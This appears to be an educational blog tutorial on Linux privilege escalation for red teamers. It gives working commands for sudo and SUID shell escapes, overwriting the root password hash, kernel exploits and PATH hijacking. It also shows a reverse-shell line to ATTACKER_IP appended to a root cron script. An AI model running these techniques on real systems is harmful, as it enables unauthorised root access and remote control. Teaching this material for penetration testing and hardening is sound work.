Linux Privilege Escalation: A Red Team Guide

In Linux security, privileges determine what actions a user or process can perform. Privilege escalation is the act of gaining higher access rights than those initially granted — a critical stage in penetration testing, red team operations, and unfortunately, real-world attacks.

For new cybersecurity learners, it's essential to first understand how privileges work before diving into escalation techniques. Without this foundation, privilege escalation may feel like magic rather than a logical exploitation process.

Understanding Linux Privileges

In Linux, privileges are permissions assigned to users and groups to control:

  • Access to files (read, write, execute)
  • Execution of system commands
  • Modifying configurations
  • Controlling processes
  • Network access

Key privilege concepts:

  • Root User (UID 0): Full control over the system. Can bypass all permission checks.
  • Normal Users: Restricted to their own files and certain commands.
  • Groups: Collections of users sharing common permissions.
  • Capabilities: Fine-grained privileges for processes (e.g., CAP_NET_ADMIN).

Example: Checking Current Privileges

whoami         # Shows current username
id             # Shows UID, GID, and groups
groups         # Lists groups you belong to
sudo -l        # Shows commands you can run as root

What is Privilege Escalation?

Privilege escalation is the second phase of most attacks after initial access. The goal: move from a limited account to root to gain full control, hide activities, and maintain persistence.

Two main categories:

  1. Vertical Escalation: From a lower privilege to a higher privilege (e.g., user → root).
  2. Horizontal Escalation: Gaining access to another account with similar privileges.

Common Privilege Escalation Vectors

1. Exploiting Sudo Misconfigurations

If sudo is configured incorrectly, you may run commands as root without a password.

sudo -l

Example vulnerable configuration:

(ALL) NOPASSWD: /usr/bin/vim

Exploit:

sudo vim -c ':!bash'

Result: Root shell.

2. Exploiting SUID/SGID Binaries

SUID binaries run with the privileges of the file owner.

Find them:

find / -perm -4000 -type f 2>/dev/null

Example:

# If /usr/bin/find has SUID bit set:
./find . -exec /bin/sh \; -quit

3. Weak File Permissions

Misconfigured permissions on /etc/passwd or /etc/shadow can be fatal.

ls -l /etc/passwd /etc/shadow

If writable:

openssl passwd newpassword
# Replace the root hash in /etc/passwd
su root

4. Exploiting Cron Jobs

If a root cron job runs a script you can edit:

cat /etc/crontab

If writable script found:

echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /path/to/script.sh

Result: Reverse shell as root on next cron run.

5. Kernel Exploits

When the kernel is outdated, known exploits can lead to root access.

Check kernel version:

uname -a

Search exploits:

searchsploit linux kernel 5.8

Run:

gcc exploit.c -o exploit
./exploit

6. Path Hijacking

If a script run by root calls binaries without absolute paths, you can replace them.

Example vulnerable script:

#!/bin/bash
tar -cf /backup.tar /important/data

Exploit:

echo "/bin/bash" > tar
chmod +x tar
export PATH=.:$PATH

Run script → Root shell.

7. Exploiting Capabilities

Check process capabilities:

getcap -r / 2>/dev/null

If binary has cap_setuid+ep:

./vulnerable_binary
# May allow privilege escalation

Red Team Mindset for Privilege Escalation

When performing red team operations:

  • Enumerate first — privilege escalation relies heavily on knowing your environment.

  • Check the obvious before the complex — misconfigurations often beat zero-days.

  • Use automated helpers like:

    • linpeas.sh
    • linux-exploit-suggester.sh
    • LSE (Linux Smart Enumeration)

Example:

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Pro Tips

  • Always check sudo -l immediately after getting a shell.
  • Look for writable directories in /etc/, /var/, and /opt/.
  • Monitor kernel versions and exploit DBs regularly.
  • In CTFs, SUID + writable scripts are the most common vector.
  • Maintain OPSEC — hide artifacts and clean up after testing.

Summary

Privilege escalation in Linux is a critical skill for red teamers and penetration testers. By understanding how privileges work, and systematically checking for misconfigurations, exploitable binaries, and outdated kernels, attackers can gain root access efficiently. For defenders, this knowledge highlights why least privilege principles and proper hardening are essential.

Love it? Share this article: